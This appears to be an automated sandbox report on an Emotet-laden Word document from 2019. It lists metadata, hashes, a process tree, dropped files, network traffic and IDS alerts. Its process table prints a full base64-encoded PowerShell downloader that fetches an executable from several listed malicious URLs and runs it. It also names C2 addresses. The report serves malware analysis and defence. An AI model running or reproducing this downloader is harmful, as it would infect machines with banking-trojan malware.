File name: | Dat_485682_2803.doc |
Full analysis: | https://app.any.run/tasks/b357357d-c280-4e74-8637-204d7e2653df |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 20, 2019, 06:32:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: user-centric Regional Refined Fresh Bike, Subject: cross-media, Author: Anjali Bruen, Comments: Handcrafted River Ergonomic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 16 14:14:00 2019, Last Saved Time/Date: Thu May 16 14:14:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0 |
MD5: | 0D580FA12D1FB77813C6AD1A3AAC8658 |
SHA1: | 43EAA01ABB9F90FB8DC668642002DDB01EA4E6B4 |
SHA256: | 4A35288D380ED810B50E8BD7AF05120A6E54B6913E776D654AA13964BA3C9D24 |
SSDEEP: | 3072:877HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qzJBVQ1J1IWig+PuS:877HUUUUUUUUUUUUUUUUUUUT52VqJBV3 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | user-centric Regional Refined Fresh Bike |
Subject: | cross-media |
Author: | Anjali Bruen |
Keywords: | - |
Comments: | Handcrafted River Ergonomic |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:16 13:14:00 |
ModifyDate: | 2019:05:16 13:14:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 170 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Bayer, Senger and Koepp |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 198 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Gaylord |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2124 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Dat_485682_2803.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2572 | PowErsHell -enC JABGAF8AMwAxAF8ANAA0AD0AJwBzADUAMAA3ADcANQAxACcAOwAkAHcAOAA2ADgANAAwACAAPQAgACcANgAyADIAJwA7ACQAawBfADUANQAxADMAPQAnAE4AOQA2ADIAMAA0AF8AOQAnADsAJABMADQAMgA3ADUAMQAwADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcAOAA2ADgANAAwACsAJwAuAGUAeABlACcAOwAkAEgANQA5ADMAXwA3ADEAPQAnAG0ANAA0ADUAMQA0ADcANQAnADsAJABFADMAMQA2ADEAOQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBgAGUAdAAuAFcAZQBiAEMAbABpAEUAYABOAFQAOwAkAFgANAA0ADUAMwA1ADAAPQAnAGgAdAB0AHAAOgAvAC8AYQBkAGUAeAAyADAAMQA5AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1ADMAOQAvAEAAaAB0AHQAcAA6AC8ALwBsAGUAZAAtAGwAYwBkAC0AcgBlAHAAYQBpAHIALgBjAG8AbQAvAFMAYwByAGkAcAB0AHMALwBvAHIAeQB6AHIAZQAxADgALwBAAGgAdAB0AHAAOgAvAC8AaAB1AGIAYwB1AGIALgBjAG8AbQAvAHQAZQBzAHQALwBwAGUANQA2AC8AQABoAHQAdABwADoALwAvAGsAYQBmAHUAbwAuAG4AZQB0AC8AMQA5ADgAOQAvAGIAeQB3AHMAMwBzADgANgAyAC8AQABoAHQAdABwADoALwAvAHMAYQBpAGcAbwBuADMAdAAuAGMAbwBtAC8AdABuAGkALwA1AGQAcgB0ADAAMQAvACcALgBTAFAAbABJAHQAKAAnAEAAJwApADsAJABqADIAMAAxADcAMgA3ADAAPQAnAGMANwAwADgANwA2ADcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHoAMwAzADUAOAA0ADYAMAAgAGkAbgAgACQAWAA0ADQANQAzADUAMAApAHsAdAByAHkAewAkAEUAMwAxADYAMQA5AC4AZABvAHcAbgBsAE8AYQBkAEYASQBMAGUAKAAkAHoAMwAzADUAOAA0ADYAMAAsACAAJABMADQAMgA3ADUAMQAwADUAKQA7ACQAQQA5ADQAMQA1ADIANQA9ACcAVwAwADQAXwA0ADEAMQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEwANAAyADcANQAxADAANQApAC4AbABFAE4ARwB0AEgAIAAtAGcAZQAgADIANQA1ADgANAApACAAewAuACgAJwBJAG4AdgAnACsAJwBvACcAKwAnAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACAAJABMADQAMgA3ADUAMQAwADUAOwAkAE0AMgA0ADkANAA2AD0AJwBYADcAMAA3ADgAMQAnADsAYgByAGUAYQBrADsAJAB0ADMAMgA2AF8AMgAyAD0AJwBzADMANwA0ADkANwA0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8ANAA4ADEAMQA3AD0AJwB3ADUANwAwADIAMwAxADkAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3872 | "C:\Users\admin\622.exe" | C:\Users\admin\622.exe | — | PowErsHell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1104 | --629d0734 | C:\Users\admin\622.exe | 622.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3664 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 622.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
620 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2124 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3461.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2572 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XCVV1F1MKY92FCBTAZF6.temp | — | |
MD5:— | SHA256:— | |||
2124 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:3107227F47377D26DFEB4773A6AFB83A | SHA256:4EE8125788061B77C12B0342B95E5F66F95A1F848A3B39220512773F24BA77B3 | |||
2124 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:327DA611E15527B5BB7DC11BC116ABB5 | SHA256:A6168CBC5FF45704AB2FDA78A8E3E7EA254804F4DFFD5910410DB6D17EC74E3D | |||
2124 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\972F27EB.wmf | wmf | |
MD5:C105C2ECE267FC69A1013CD2017EFBE1 | SHA256:F2DD4549ED620456220D6C532E337B7D01FFD2F39170D49492CA6AFE7DE97592 | |||
2124 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4562C7E.wmf | wmf | |
MD5:CA624F41D9DFF3F09B391AB0C4E299A8 | SHA256:596590EED4509CC453A6ECC4AB97F613ED7DE2A61CAD88E5FD095DFF8BAA00C5 | |||
2124 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16687667.wmf | wmf | |
MD5:A99075CDCF1B12BBD833ADAF189A1E94 | SHA256:B723F876DBEA4C25F3807D89BC58DDA057EEA811DA3817394829BEB95F69CF44 | |||
2124 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D3FA8F0.wmf | wmf | |
MD5:B2A576FF2E259234E9A77E8F0F72B293 | SHA256:5835A48B1C03C0671F537AB4879C07B09AA5142F3C9FB7D311AFA52DB7F45B2F | |||
2124 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\631DB2AA.wmf | wmf | |
MD5:A87E49FB6630450D49A274CC6103D28C | SHA256:9DA61941D260D05E3BA4D03141D54C9564F46275EEC0689DDB2F331DE1963BA4 | |||
2572 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
620 | soundser.exe | POST | — | 80.0.106.83:80 | http://80.0.106.83/jit/splash/ringin/merge/ | GB | — | — | malicious |
2572 | PowErsHell.exe | GET | 200 | 209.205.200.218:80 | http://adex2019.com/wp-admin/u39/ | US | executable | 74.0 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
620 | soundser.exe | 80.0.106.83:80 | — | Virgin Media Limited | GB | malicious |
2572 | PowErsHell.exe | 209.205.200.218:80 | adex2019.com | 24 SHELLS | US | malicious |
Domain | IP | Reputation |
---|---|---|
adex2019.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2572 | PowErsHell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2572 | PowErsHell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2572 | PowErsHell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |